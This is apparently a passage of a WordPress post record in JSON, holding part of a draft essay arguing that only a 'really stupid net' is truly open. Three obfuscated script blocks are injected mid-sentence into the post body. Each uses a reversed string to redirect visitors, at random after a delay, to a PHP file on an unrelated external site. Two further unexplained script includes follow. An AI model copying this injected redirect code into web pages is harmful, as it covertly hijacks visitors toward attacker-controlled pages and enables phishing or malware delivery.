$NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to have different hardware for each<br \/>connection. But that is a universal problem and not connected <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to the<br \/>stupid net. It must be solved quite independently from the network<br \/>design. Also, with more and more mobile users it is impossible <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>to<br \/>solve these problems within the net. They must work where-ever the user<br \/>is in the whole world.<\/p>\n<p><script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Only Really Open Net Is The Really Stupid Net ! (draft) Nisse Husberg, Dr.Techn. Many claim to have an &#8221;open access network&#8221; structure but in realitythis is not true in most cases. There are all kinds of limitations forthe openness. Definition of Open Network An open net cannot be compared to a telephone exchange &hellip; <a href=\"https:\/\/hindersby.net\/nywp\/?p=80\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dThe Only Really Open Net Is The Really Stupid Net !\u201d<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-80","post","type-post","status-publish","format-standard","hentry","category-12"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/posts\/80","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=80"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/posts\/80\/revisions"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=80"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=80"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=80"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}